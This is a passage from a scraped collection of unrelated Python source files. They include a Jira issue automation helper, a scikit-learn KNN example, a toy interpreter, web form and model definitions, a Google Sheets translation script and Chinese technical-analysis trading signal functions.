self.saveSession()\r\n users = self.jira.search_users(jira_id)\r\n if len(users)==1: ## found user\r\n return users[0]\r\n return None\r\n\r\n def concateModelNameForSummary(self, model_data):\r\n return (self.issue_template['summary']\r\n +\"[\"+model_data[Dev_Meta.idxRegion]+\"] \"\r\n + model_data[Dev_Meta.idxModelName])\r\n\r\n def getFieldsForModelIssue(self, dev_version, model_data):\r\n tracker = self.jira\r\n new_issue = self.issue_template.copy()\r\n new_issue['summary'] = self.concateModelNameForSummary(model_data)\r\n #new_issue['labels'].append(dev_version)\r\n new_issue['labels']=[\"실물검증\"]\r\n new_issue['description']= '''\r\n 개발 Master Ver. : {ver}\\n\r\n 엑셀 행 번호: {row}\\n\r\n Model Name : {model}\\n\r\n DV 시작 : {dv_start}\\n\r\n DV 종료 : {dv_end}\\n\r\n 담당자 ===========\\n\r\n SW : 이가영Y\\n\r\n HW PL : {hwpl}\\n\r\n 기획 : {plan}\r\n '''.format(ver=dev_version, row=model_data[len(model_data)-1], model=model_data[Dev_Meta.idxModelName], \\\r\n hwpl= model_data[Dev_Meta.idxHwPL], plan=model_data[Dev_Meta.idxHwPL+1], \\\r\n dv_start=model_data[Dev_Meta.idxDvStart], dv_end=model_data[Dev_Meta.idxDvEnd])\r\n return new_issue\r\n\r\n def getFieldsForSpecCheckIssue(self, model_data, parent_issue):\r\n if parent_issue is None:\r\n # model issue (parent issue)가 생성 실패되었음\r\n return None\r\n\r\n tracker = self.jira\r\n new_issue = self.issue_template.copy()\r\n new_issue['summary'] = self.concateModelNameForSummary(model_data)+ ' Spec. 확인 요청'\r\n model_name = model_data[Dev_Meta.idxModelName]\r\n new_issue['labels']=[\"실물검증\"]\r\n new_issue['description']= '''\r\n 모델 : {color:red}'''+model_name+'{color}\\n'\r\n\r\n new_issue['description']+= '''\r\n 상기 모델에 대해 E-Streamer 적용되어야 할 Spec. 모델명 확인 요청 드립니다.\\n\r\n Spec. 모델명이란 E-Streamer Spec. Sheet 상에 지역 탭에 정의된 'Model Name' 항목을 의미합니다.\\n\r\n 모델에 대한 정보는 본 이슈의 상위 이슈를 참조하세요.\\n\r\n E-Streamer Spec. Sheet 기준 적용 모델명을 comment에 기입 후 Resolve 부탁 드립니다.'''\r\n\r\n new_issue['issuetype'] = {'name' : 'Sub-task'}\r\n new_issue['parent'] = {'id' : parent_issue.key}\r\n return new_issue\r\n\r\n def getFieldsForTestIssue(self, model_data, parent_issue):\r\n if parent_issue is None:\r\n # model issue (parent issue)가 생성 실패되었음\r\n return None\r\n\r\n tracker = self.jira\r\n new_issue = self.issue_template.copy()\r\n new_issue['summary'] = self.concateModelNameForSummary(model_data)+ ' 실물 확인'\r\n model_name = model_data[Dev_Meta.idxModelName]\r\n new_issue['description']= '''\r\n 모델 : {color:red}'''+model_name+'{color}\\n'\r\n\r\n new_issue['description']+= '''\r\n 유첨 E-Streamer 적용 결과 이미지 참조하시어 실물 점검 부탁 드립니다.\\n\r\n 모델 정보는 상위 이슈 참조하세요.\\n\r\n Comment 확인하시어 지역(Area) 내 전 국가 실물 확인 후 Resolve 부탁 드립니다.\\n\r\n\r\n PPM 포맷 이미지 뷰어는 알씨 등이 지원하고 있으며 아래 사이트에서도 쉽게 다운로드 가능합니다.\\n\r\n : http://free-ppm-viewer.en.informer.com/\\n\r\n : 캡쳐 파일 바로 열기에 문제가 있을 경우 이미지 파일을 로컬에 저장 후 열어주세요.\\n'''\r\n\r\n new_issue['issuetype'] = {'name' : 'Sub-task'}\r\n new_issue['parent'] = {'id' : parent_issue.key}\r\n return new_issue\r\n\r\n\r\n def inquiryModelIssue(self, model_name):\r\n tracker = self.jira\r\n result_list = tracker.search_issues(self.jql_model+' AND summary~\"'+model_name+'\"')\r\n if len(result_list)!=1:\r\n print(\"search failed !. number of result length : \"+len(result_list))\r\n return None\r\n return result_list[0]\r\n\r\n def inquiryTestIssue(self, model_name):\r\n tracker = self.jira\r\n result_list = tracker.search_issues(self.jql_test+' AND summary~\"'+model_name+'\"')\r\n if len(result_list)!=1:\r\n print(\"search failed !. number of result length : \"+len(result_list))\r\n return None\r\n return result_list[0]\r\n\r\n def inquirySpecConfirmIssue(self, model_name):\r\n tracker = self.jira\r\n result_list = tracker.search_issues(self.jql_spec+' AND summary~\"'+model_name+'\"')\r\n if len(result_list)!=1:\r\n print(\"search failed !. number of result length : \"+len(result_list))\r\n return None\r\n return result_list[0]\r\n\r\n def resolveIssueForDroppedModel(self, ver, issue_key):\r\n tracker = self.jira\r\n try:\r\n issue = tracker.issue(issue_key)\r\n status_name = issue.fields.status.name\r\n except:\r\n return\r\n comment_body = '개발 Master '+ver+' 에서 본 모델 Drop되어 Resolve 합니다.'\r\n\r\n if status_name != 'Resolved' and status_name != 'Closed':\r\n tracker.transition_issue(issue, 'Resolve Issue', comment=comment_body)\r\n\r\n def createModelIssueAndSubTasks(self, dev_version, model):\r\n try:\r\n ## 1) create model issue\r\n print('start get fields of model issue')\r\n model_fields = self.getFieldsForModelIssue(dev_version, model)\r\n print('complete get fields of model issue')\r\n model_issue = self.jira.create_issue(fields=model_fields)\r\n print('complete create model issue')\r\n\r\n ## 2) create spec.확인 issue\r\n spec_fields = self.getFieldsForSpecCheckIssue(model, model_issue)\r\n self.jira.create_issue(fields=spec_fields)\r\n\r\n ## 3) create 실물확인 issue\r\n test_fields = self.getFieldsForTestIssue(model, model_issue)\r\n self.jira.create_issue(fields=test_fields)\r\n except:\r\n print(\"failed to create model issues : \"+model[Dev_Meta.idxModelName])\r\n if model_issue is not None:\r\n model_issue.delete()\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# issue = jira_usr.issue(\"ESTREAMER-127\")\r\n# project = jira_usr.project(\"ESTREAMER\")\r\n#\r\n#\r\n# rawdata = issue.raw\r\n#\r\n#\r\n#\r\n# print(rawdata)\r\n\r\n\r\n# import re\r\n# from jira import JIRA\r\n#\r\n# options = {'server': 'http://hlm.lge.com/qi/'}\r\n# jira = JIRA(options)\r\n#\r\n# projects = jira.projects();\r\n#\r\n# print(\"projects type : \"+type(projects))\r\n#\r\n# issue = jira.issue('ESTREAMER-127')\r\n# print(\"issue type : \"+type(issue))\r\n","sub_path":"UI_part/JIRA_E-Streamer/JIRA_Handle.py","file_name":"JIRA_Handle.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"472838703","text":"from sklearn import datasets\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\nnp.random.seed(0)\ndatapath = 'E:\\ML\\Knn\\iris.csv'\ndataarray = np.loadtxt(datapath, delimiter = ',', usecols = [0, 1, 2, 3])\nlabelarray = np.loadtxt(datapath, delimiter = ',', usecols = [4], dtype = str)\nindex = np.random.permutation(len(dataarray))\niris_x_trian = dataarray[index[:-10]]\niris_y_trian = labelarray[index[: -10]]\niris_x_test = dataarray[index[-10:]]\niris_y_test = labelarray[index[-10:]]\nknn = KNeighborsClassifier()\nknn.fit(iris_x_trian, iris_y_trian)\niris_y_predict = knn.predict(iris_x_test)\nprobility = knn.predict_proba(iris_x_test)\nneighborpoint = knn.kneighbors(iris_x_test[-1], 5, False)\nscore = knn.score(iris_x_test, iris_y_test,sample_weight = None)\nprint('iris_y_predict = ')\nprint(iris_y_predict)\nprint('iris_y_test =')\nprint(iris_y_test)\n\n\n\n","sub_path":"ML/Sklearn/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"254295353","text":"class Interpreter:\n def __init__(self):\n self.stack = []\n self.environment = {}\n\n def LOAD_VALUE(self, number):\n self.stack.append(number)\n\n def PRINT_ANSWER(self):\n print(self.stack.pop())\n\n def ADD_TWO_VALUES(self):\n self.stack.append(self.stack.pop() + self.stack.pop())\n\n def STORE_NAME(self, name):\n self.environment[name] = self.stack.pop()\n\n def LOAD_NAME(self, name):\n self.stack.append(self.environment[name])\n\n def parse_argument(self, instruction, arg, to_execute):\n \"\"\"parse argument to call the correct function\"\"\"\n numbers = [\"LOAD_VALUE\"]\n names = [\"STORE_NAME\", \"LOAD_NAME\"]\n\n if instruction in numbers:\n return (instruction, to_execute['numbers'][arg])\n elif instruction in names:\n return (instruction, to_execute['names'][arg])\n else:\n return (instruction, None)\n\n def run_code(self, to_execute):\n numbers = to_execute[\"numbers\"]\n\n if len(numbers) == 2:\n for step in to_execute[\"instructions\"]:\n (instruction, argument) = self.parse_argument(step[0], step[1], to_execute)\n method = getattr(self, instruction)\n if argument is None:\n method()\n else:\n method(argument)\n\n\nif __name__ == '__main__':\n what_to_execute = {\n \"instructions\": [\n (\"LOAD_VALUE\", 0),\n (\"STORE_NAME\", 0),\n (\"LOAD_VALUE\", 1),\n (\"STORE_NAME\", 1),\n (\"LOAD_NAME\", 0),\n (\"LOAD_NAME\", 1),\n (\"ADD_TWO_VALUES\", None),\n (\"PRINT_ANSWER\", None)\n ],\n \"numbers\": [7, 5],\n \"names\": ['a', 'b']\n }\n\n Interpreter().run_code(what_to_execute)","sub_path":"Interpreter.py","file_name":"Interpreter.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"522725184","text":"import datetime\n\n\ndef pk_terms_for_task(task, parent):\n action = task['Action']\n preposition = \" with \" if task['Indirect'] else \"\"\n prepreposition = \" \" if task['Direct'] else \"\"\n if action == \"Attend\" and not task['Direct']:\n preposition = \" to \"\n if action in (\"Migrate\", \"Transfer\", \"Travel\"):\n preposition = \" to \"\n elif action in (\"Present\", ):\n preposition = \" on \"\n elif action in (\"Buy\", ):\n preposition = \" for \"\n elif action in (\n \"Ideate\",\n \"Deliberate\",\n \"Muse\",\n ):\n preposition = \" on \"\n elif action in (\"Upload\", ):\n preposition = \" from \"\n elif action in (\"Vacation\", ):\n prepreposition = \" in \"\n elif action in (\"Lunch\", \"Dine\", \"Shop\", \"Tennis\", \"Coffee\"):\n if task['Direct']:\n prepreposition = \" at \"\n elif action in (\"Tend\", ):\n prepreposition = \" to \"\n elif action in (\"Jam\", ):\n if task['Direct']:\n prepreposition = \" at \"\n elif action == \"Liase\":\n prepreposition = \" with \"\n preposition = \" on \"\n direct_clause, indirect_clause = \"\", \"\"\n mandate = [\n action, prepreposition, task['Direct'], preposition, task['Indirect']\n ]\n if task[\"Parameters\"]:\n marker = \" at\" if action in (\"Extend\", \"Improve\", \"Sustain\") else \",\"\n mandate.append(\"{} {}\".format(marker, task['Parameters']))\n planned_start, planned_span = task[\"Param~Start\"], task[\"Param~Span\"]\n distinguisher = (\n datetime.datetime(1970, 1, 1) +\n datetime.timedelta(days=int(planned_start))).strftime(\"%d %b %Y\")\n if task[\"Param~Span\"] and task[\"Param~Span\"] != \"Day\":\n distinguisher = \"{} of {}\".format(task[\"Param~Span\"], distinguisher)\n mandate.append(\" ({})\".format(distinguisher))\n return mandate\n\n\ndef pk_for_task(task, parent):\n # TODO(rabrams) this function no longer needs a provided parent\n # so let's get rid of it as an input\n return \"\".join(pk_terms_for_task(task, parent))\n\n\nclass TimeDB(object):\n\n def __init__(self, db):\n self.db = db\n\n def update_files_pk(self, old, new):\n files = self.db[\"files\"]\n f = files[old]\n del files[old]\n files[new] = f\n\n def update_task_pk(self, old, new):\n if old == new:\n return\n if new in self.db[\"tasks\"]:\n raise ValueError(\"key already exists\", new)\n task = self.db[\"tasks\"][old]\n del self.db[\"tasks\"][old]\n self.db[\"tasks\"][new] = task\n self.update_task_in_log(old, new)\n self.update_arg_in_assertions(\"tasks\", old, new)\n for task in self.db[\"tasks\"].values():\n if task[\"Primary Goal\"] == old:\n task[\"Primary Goal\"] = new\n\n def update_task_in_log(self, old, new):\n # TODO should hash this\n for pk, log in self.db[\"log\"].items():\n if log[\"A Task\"] == old:\n log[\"A Task\"] = new\n # NOTE not changing PKs here as they require context on\n # other entries and it's not really needed\n\n def update_arg_in_assertions(self, table, old, new):\n full_id = \"tasks {}\".format(old)\n new_full_id = \"tasks {}\".format(new)\n # Take a snapshot of assertions to not modify while iterating\n for pk, assn in list(self.db[\"assertions\"].items()):\n if assn[\"Arg1\"] == full_id:\n assn[\"Arg1\"] = new_full_id\n if assn[\"Arg0\"] == full_id:\n assn[\"Arg0\"] = new_full_id\n new_pk = pk_for_assertion(assn)\n del self.db[\"assertions\"][pk]\n self.db[\"assertions\"][new_pk] = assn\n if assn[\"A Relation\"] == \".Do Today\" and assn[\"Arg1\"] == f\"[ ] {old}\":\n assn[\"Arg1\"] = f\"[ ] {new}\"\n if assn[\"A Relation\"] == \".Do Today\" and assn[\"Arg1\"] == f\"[x] {old}\":\n assn[\"Arg1\"] = f\"[x] {new}\"\n\n\n\ndef pk_for_assertion(assn):\n key = (assn[\"A Relation\"], assn[\"Arg0\"], assn[\"Order\"])\n return str(key)\n","sub_path":"lib/py/timedb/pks.py","file_name":"pks.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"310446913","text":"import tabula\nimport pandas as pd\n\nVALIDATOR = 'CONTATOR'\n\nHEAD_COFINS = ['Modelo', 'Série', 'Número_Nota', 'Emissão','Descrição',\n 'Cod_Mercadoria', 'CFOP', 'UF', 'Unidade', 'Quantidade', 'Valor', 'Diferença', 'COFINS']\nNEW_HEAD_COFINS = ['Modelo', 'Série', 'Número_Nota', 'Emissão','NCM', 'Descrição',\n 'Cod_Mercadoria', 'CFOP', 'UF', 'Unidade', 'Quantidade', 'Valor', 'Diferença', 'COFINS']\ndef format_df(row):\n if row['Descrição'].count(VALIDATOR)==1:\n index = int(row['index'])+1\n x = df.loc[df['index'] == index, 'Descrição'].values[0]\n df['NCM'] = row['Descrição'][:9]\n row['Descrição'] = row['Descrição'][8:]+x\n\n return row\n else:\n return 'remove'\n\ndf_result = pd.DataFrame()\nPATH = \"C:\\\\Users\\\\felipe.santana\\\\desktop\\\\Jobs\\\\Thulio\\\\felipe\\\\Laudo\\\\COFINS\\\\2010 COFINS - 10283723413201666_05673_07166_DOCUMENTOSDIVERSOS-OUTROS.PDF\"\nfile = tabula.read_pdf(PATH, output_format='dataframe', encoding='ANSI', java_options=None, pages='all').fillna('')\nfor i in file:\n df = i\n df.columns = HEAD_COFINS\n df = df.drop(index=[0,1])\n df['Descrição'] = df['Descrição'].astype(str)\n\n df = df.reset_index()\n\n df = df.apply(lambda row: format_df(row), axis=1)\n df = df[~df.Descrição.str.contains(\"remove\") == True]\n df = df[NEW_HEAD_COFINS]\n df_result = pd.concat(df_result,df)\n\n\nwrite = pandas.ExcelWriter('C:\\\\Users\\\\felipe.santana\\\\desktop\\\\Jobs\\\\Thulio\\\\felipe\\\\NEW\\\\NEW\\\\2010 COFINS - 10283723413201666_05673_07166_DOCUMENTOSDIVERSOS-OUTROS.xlsx')\ndf.to_excel(write,'Teste', index=False)\nwrite.save()\n","sub_path":"ExtractPDFCofins.py","file_name":"ExtractPDFCofins.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"230007846","text":"import constants\nfrom wtforms import validators, Form, FloatField, SelectField, TextAreaField\n\n\nclass PaymentForm(Form):\n \"\"\" Payment form class with fields validation \"\"\"\n\n amount = FloatField('Amount',\n validators=[\n validators.required(message='Amount field is required.'),\n validators.number_range(\n min=constants.amount_min,\n message='Minimum possible amount: {0:.2f}.'.format(constants.amount_min)\n )\n ])\n\n currency = SelectField('Currency', choices=constants.currency_choices)\n\n description = TextAreaField('Product description',\n validators=[\n validators.required(message='Description field is required.'),\n validators.length(\n min=constants.description_min_length,\n max=constants.description_max_length,\n message='Description length should be between {0} and {1} symbols.'.format(\n constants.description_min_length,\n constants.description_max_length\n )\n )\n ])\n","sub_path":"payment/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"246441269","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Post(models.Model):\n text = models.TextField(blank=True, null=True)\n created_date = models.DateField(default=timezone.now, blank=True, null=True)\n published_date = models.DateTimeField(default=timezone.now, blank=True, null=True)\n image = models.ImageField(upload_to='static/home', blank=True, null=True)\n \n def publish(self):\n self.published_date = timezone.now\n self.save()\n \n''' def __str__(self):\n if self.text:\n return self.text\n'''\n'''\n if self.image:\n return self.image\nException Type:\tTypeError\nException Value:\t\n__str__ returned non-string (type ImageFieldFile)\n'''","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"413731323","text":"\"\"\"add lab users\n\nRevision ID: 63819a8dbc41\nRevises: 0dae246c7b99\nCreate Date: 2017-02-23 20:00:15.014555\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '63819a8dbc41'\ndown_revision = '0dae246c7b99'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('labs_users',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('lab_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['lab_id'], ['lab.laboratory_id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('labs_users')\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/63819a8dbc41_add_lab_users.py","file_name":"63819a8dbc41_add_lab_users.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"438384844","text":"import os\nimport google.oauth2.credentials\nimport pickle\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\n\nCREDENTIALS_FILE = \"credentials.json\"\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\nAPI_SERVICE_NAME = 'sheets'\nAPI_VERSION = 'v4'\n\ndef get_authenticated_service():\n credentials = None\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n credentials = pickle.load(token)\n if not credentials or not credentials.valid:\n if credentials and credentials.expired and credentials.refresh_token:\n credentials.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS_FILE, SCOPES)\n credentials = flow.run_console()\n \n with open('token.pickle', 'wb') as token:\n pickle.dump(credentials, token)\n \n return build(API_SERVICE_NAME, API_VERSION, credentials = credentials)\n \ndef translate(service, phrase):\n sheet = service.spreadsheets()\n spreadsheet = {\n 'properties': {\n 'title': 'translator'\n }\n }\n print('Creating sheet...')\n spreadsheet = sheet.create(body=spreadsheet,fields='spreadsheetId').execute()\n spreadsheet_id = spreadsheet.get('spreadsheetId')\n \n values = [\n [\n phrase, '=GOOGLETRANSLATE(A2, \"en\", \"de\")'\n ],\n ]\n body = {\n 'values': values\n }\n print('Translating phrase...')\n result = service.spreadsheets().values().update(\n spreadsheetId=spreadsheet_id, range='A2:B2',\n valueInputOption='USER_ENTERED', body=body).execute()\n \n print('Retrieving translation...')\n result = service.spreadsheets().values().get(\n spreadsheetId=spreadsheet_id, range='B2').execute()\n rows = result.get('values', [])\n \n print('Original: {}'.format(phrase))\n print('Translation: {}'.format(rows[0][0]))\n \n print('Done')\n \n\nif __name__ == '__main__':\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n service = get_authenticated_service()\n translate(service, 'Hello World')","sub_path":"assignments/Sprint7/sprint7.py","file_name":"sprint7.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"510570315","text":"# coding: utf-8\n\nimport traceback\nfrom .analyze import KlineAnalyze, is_bei_chi, get_ka_feature\n\n\ndef is_in_tolerance(base_price, latest_price, tolerance):\n \"\"\"判断 latest_price 是否在 base_price 的买入容差范围(上下 tolerance)\"\"\"\n if (1 - tolerance) * base_price <= latest_price <= (1 + tolerance) * base_price:\n return True\n else:\n return False\n\n\ndef is_first_buy(ka, ka1, ka2=None, pf=False):\n \"\"\"确定某一级别一买\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别一买,返回 `无操作` !!!\n\n 一买识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记重合且为底分型;\n 2)必须:上级别最后一个向下线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型;\n 3)必须:本级别向下线段背驰 或 本级别向下笔背驰;\n\n 4)辅助:下级别向下线段背驰 或 下级别向下笔背驰。\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记重合且为底分型;\n if len(ka1.xd) >= 2 and ka1.xd[-1]['xd'] == ka1.bi[-1]['bi'] \\\n and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'd':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向下线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型;\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'd':\n # 本级别向下线段背驰 或 本级别向下笔背驰;\n if (ka.xd_bei_chi() or\n (ka.bi[-1]['fx_mark'] == 'd' and ka.bi_bei_chi())):\n detail['操作提示'] = \"一买\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail[\"操作提示\"] == \"一买\" and isinstance(ka2, KlineAnalyze):\n # 下级别线段背驰 或 下级别笔背驰\n if not ((ka2.xd[-1]['fx_mark'] == 'd' and ka2.xd_bei_chi()) or\n (ka2.bi[-1]['fx_mark'] == 'd' and ka2.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_first_sell(ka, ka1, ka2=None, pf=False):\n \"\"\"确定某一级别一卖\n\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别一卖,返回 `无操作` !!!\n\n 一卖识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记重合且为顶分型;\n 2)必须:上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型;\n 3)必须:本级别向上线段背驰 或 本级别向上笔背驰;\n\n 4)辅助:下级别向上线段背驰 或 下级别向上笔背驰。\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记重合且为顶分型;\n if len(ka1.xd) >= 2 and ka1.xd[-1]['xd'] == ka1.bi[-1]['bi'] \\\n and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'g':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型;\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'g':\n\n # 本级别向上线段背驰 或 本级别向上笔背驰\n if (ka.xd_bei_chi() or\n (ka.bi[-1]['fx_mark'] == 'g' and ka.bi_bei_chi())):\n detail['操作提示'] = \"一卖\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail[\"操作提示\"] == \"一卖\" and isinstance(ka2, KlineAnalyze):\n # 下级别线段背驰 或 下级别笔背驰\n if not ((ka2.xd[-1]['fx_mark'] == 'g' and ka2.xd_bei_chi()) or\n (ka2.bi[-1]['fx_mark'] == 'g' and ka2.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_second_buy(ka, ka1, ka2=None, pf=False):\n \"\"\"确定某一级别二买\n\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别二买,返回 `无操作` !!!\n\n 二买识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记都是底分型;\n 2)必须:上级别最后一个向下线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型,不创新低;\n 3)必须:上级别最后一个线段标记后有且只有三个笔标记,且上级别向下笔不创新低;\n\n 4)辅助:下级别向下线段背驰 或 下级别向下笔背驰\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记都是底分型;\n if len(ka1.xd) >= 2 and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'd':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为底分型,不创新低;\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'd' \\\n and ka.xd[-1][\"xd\"] > ka.xd[-3]['xd']:\n\n # 上级别最后一个线段标记后有且只有三个笔标记,且上级别向下笔不创新低;\n bi_next = [x for x in ka1.bi if x['dt'] >= ka1.xd[-1]['dt']]\n if len(bi_next) == 3 and bi_next[-1]['fx_mark'] == 'd' \\\n and bi_next[-1]['bi'] > bi_next[-3]['bi']:\n detail['操作提示'] = \"二买\"\n detail['出现时间'] = ka.xd[-1]['dt']\n detail['基准价格'] = ka.xd[-1]['xd']\n\n if pf and detail[\"操作提示\"] == \"二买\" and isinstance(ka2, KlineAnalyze):\n # 下级别向下线段背驰 或 下级别向下笔背驰\n if not ((ka2.xd[-1]['fx_mark'] == 'd' and ka2.xd_bei_chi()) or\n (ka2.bi[-1]['fx_mark'] == 'd' and ka2.bi_bei_chi())):\n detail['操作提示'] = \"无操作\"\n return detail\n\n\ndef is_second_sell(ka, ka1, ka2=None, pf=False):\n \"\"\"确定某一级别二卖,包括类二卖\n\n 注意:如果本级别上一级别的 ka 不存在,无法识别本级别一买,返回 `无操作` !!!\n\n 二卖识别逻辑:\n 1)必须:上级别最后一个线段标记和最后一个笔标记都是顶分型;\n 2)必须:上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型,不创新高;\n 3)必须:上级别最后一个线段标记后有且只有三个笔标记,且上级别向上笔不创新低;\n\n 4)辅助:下级别向上线段背驰 或 下级别向上笔背驰\n\n :param ka: KlineAnalyze\n 本级别\n :param ka1: KlineAnalyze\n 上级别\n :param ka2: KlineAnalyze\n 下级别,默认为 None\n :param pf: bool\n pf 为 precision first 的缩写, 控制是否使用 `高精度优先模式` ,默认为 False ,即 `高召回优先模式`。\n 在 `高精度优先模式` 下,会充分利用辅助判断条件提高识别准确率。\n\n :return: dict\n \"\"\"\n detail = {\n \"标的代码\": ka.symbol,\n \"操作提示\": \"无操作\",\n \"出现时间\": None,\n \"基准价格\": None,\n \"其他信息\": None\n }\n\n if not isinstance(ka1, KlineAnalyze):\n return detail\n\n # 上级别最后一个线段标记和最后一个笔标记都是顶分型\n if len(ka1.xd) >= 2 and ka1.xd[-1]['fx_mark'] == ka1.bi[-1]['fx_mark'] == 'g':\n bi_inside = [x for x in ka1.bi if ka1.xd[-2]['dt'] <= x['dt'] <= ka1.xd[-1]['dt']]\n\n # 上级别最后一个向上线段内部笔标记数量大于等于6,且本级别最后一个线段标记为顶分型,不创新高\n if len(bi_inside) >= 6 and ka.xd[-1]['fx_mark'] == 'g' \\\n and ka.xd[-1][\"xd\"] < ka.xd[-3]['xd']:\n\n # 上级别最后一个线段标记后有且只有三个笔标记,且上级别向上笔不创新低\n bi_next = [x for x in ka1.bi if x['dt'] >= ka1.xd[-1]['dt']]\n if len(bi_next) == 3 and bi_next[-1]['fx_mark'] == 'g' \\\n and bi_next[-1]['bi'] < bi_next[-3]['bi']:\n detail['操作提示'] = \"二卖\"\n detail['出现时间'] = 